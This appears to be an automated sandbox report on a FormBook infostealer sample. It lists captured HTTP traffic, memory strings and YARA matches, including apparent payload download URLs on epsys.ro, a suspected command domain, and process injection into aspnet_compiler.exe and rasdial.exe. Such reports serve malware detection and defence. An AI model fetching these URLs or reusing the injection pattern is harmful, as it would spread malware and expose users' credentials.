            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:44 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62026-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:46 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62026-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:49 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62026-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 13:44:51 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62026-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 13:44:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 13:45:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 13:45:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 13:45:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: x.exe, 00000000.00000002.3325930862.00000000061CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsv
            Source: x.exe, 00000000.00000002.3320685418.000000000316C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://epsys.ro
            Source: x.exe, 00000000.00000002.3320685418.000000000316C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://epsys.rod
            Source: x.exe, 00000000.00000002.3325930862.00000000061CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.conXn
            Source: x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: crUcuBAsmdG.exe, 00000009.00000002.3320183434.000000000544D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pmjjewels.online
            Source: crUcuBAsmdG.exe, 00000009.00000002.3320183434.000000000544D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.pmjjewels.online/zksk/
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000006.00000002.3319482531.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000003B7E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: x.exe, 00000000.00000002.3320685418.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://epsys.ro
            Source: x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://epsys.ro/we/DEMONCODER.dll
            Source: x.exe, 00000000.00000002.3320685418.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://epsys.ro/we/bin.exe
            Source: x.exe, 00000000.00000002.3320685418.0000000003149000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.00000000030DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://epsys.ro/we/bin.exeDhttps://epsys.ro/we/DEMONCODER.dll
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000006.00000003.2066229054.0000000007C04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033A
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000006.00000002.3316528748.0000000002EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rasdial.exe, 00000006.00000002.3319482531.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000003B7E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech
            Source: rasdial.exe, 00000006.00000002.3319482531.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000003B7E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownHTTPS traffic detected: 89.42.218.72:443 -> 192.168.2.8:49706 version: TLS 1.2

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0042C0F3 NtClose,3_2_0042C0F3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2B60 NtClose,LdrInitializeThunk,3_2_01AF2B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01AF2DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01AF2C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF35C0 NtCreateMutant,LdrInitializeThunk,3_2_01AF35C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF4340 NtSetContextThread,3_2_01AF4340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF4650 NtSuspendThread,3_2_01AF4650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2BA0 NtEnumerateValueKey,3_2_01AF2BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2B80 NtQueryInformationFile,3_2_01AF2B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2BE0 NtQueryValueKey,3_2_01AF2BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2BF0 NtAllocateVirtualMemory,3_2_01AF2BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2AB0 NtWaitForSingleObject,3_2_01AF2AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2AF0 NtWriteFile,3_2_01AF2AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2AD0 NtReadFile,3_2_01AF2AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2DB0 NtEnumerateKey,3_2_01AF2DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF2DD0 NtDelayExecution,3_2_01AF2DD0
